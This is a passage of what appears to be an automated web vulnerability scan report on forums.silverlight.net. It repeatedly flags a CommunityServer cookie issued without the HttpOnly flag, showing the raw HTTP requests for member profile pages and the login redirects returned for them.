HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 234 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fhoumie.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:21 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fhoumie.aspx ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:28 GMT; expires=Sun, 29-Jan-2012 23:16:28 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/ilektrik.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 236 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2filektrik.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:28 GMT; expires=Sun, 29-Jan-2012 23:16:28 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:28 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2filektrik.as ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:07 GMT; expires=Sun, 29-Jan-2012 23:17:07 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/jamlew.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 234 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjamlew.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:07 GMT; expires=Sun, 29-Jan-2012 23:17:07 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:08 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjamlew.aspx ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/jerry-weng-_2D00_-msft.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 250 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjerry-weng-_2D00_-msft.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:15:38 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjerry-weng- ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/jesseliberty.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 240 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjesseliberty.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:15:37 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjesselibert ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/jimpoteet.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 237 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjimpoteet.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:20 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjimpoteet.a ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:15 GMT; expires=Sun, 29-Jan-2012 23:16:15 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/jperl.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 233 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjperl.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:15 GMT; expires=Sun, 29-Jan-2012 23:16:15 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:15 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fjperl.aspx" ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:04 GMT; expires=Sun, 29-Jan-2012 23:16:04 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/khalzoro.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 236 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fkhalzoro.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:04 GMT; expires=Sun, 29-Jan-2012 23:16:04 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:05 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fkhalzoro.as ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:03 GMT; expires=Sun, 29-Jan-2012 23:17:03 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/kylemc.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 234 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fkylemc.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:03 GMT; expires=Sun, 29-Jan-2012 23:17:03 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:04 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fkylemc.aspx ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:29 GMT; expires=Sun, 29-Jan-2012 23:16:29 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/lein4d.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 234 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2flein4d.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:29 GMT; expires=Sun, 29-Jan-2012 23:16:29 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:29 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2flein4d.aspx ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:19 GMT; expires=Sun, 29-Jan-2012 23:41:19 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/malignate.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 237 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fmalignate.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:19 GMT; expires=Sun, 29-Jan-2012 23:41:19 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:41:20 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fmalignate.a ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:19 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/mbanavige.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 237 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fmbanavige.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:19 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:20 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fmbanavige.a ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:01 GMT; expires=Sun, 29-Jan-2012 23:17:01 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/pitchai.be.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 238 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fpitchai.be.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:01 GMT; expires=Sun, 29-Jan-2012 23:17:01 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:00 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fpitchai.be. ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:19 GMT; expires=Sun, 29-Jan-2012 23:41:19 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/rightcoder.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 238 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2frightcoder.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:41:19 GMT; expires=Sun, 29-Jan-2012 23:41:19 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:41:19 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2frightcoder. ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:34 GMT; expires=Sun, 29-Jan-2012 23:16:34 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/samw.aspx HTTP/1.1 Host: forums.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;
Response
HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 232 Content-Type: text/html; charset=utf-8 Expires: -1 ETag: "" Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsamw.aspx Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CommunityServer: 3.0.20416.853 Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:34 GMT; expires=Sun, 29-Jan-2012 23:16:34 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:16:34 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fsamw.aspx"> ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:41 GMT; expires=Sun, 29-Jan-2012 23:15:41 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
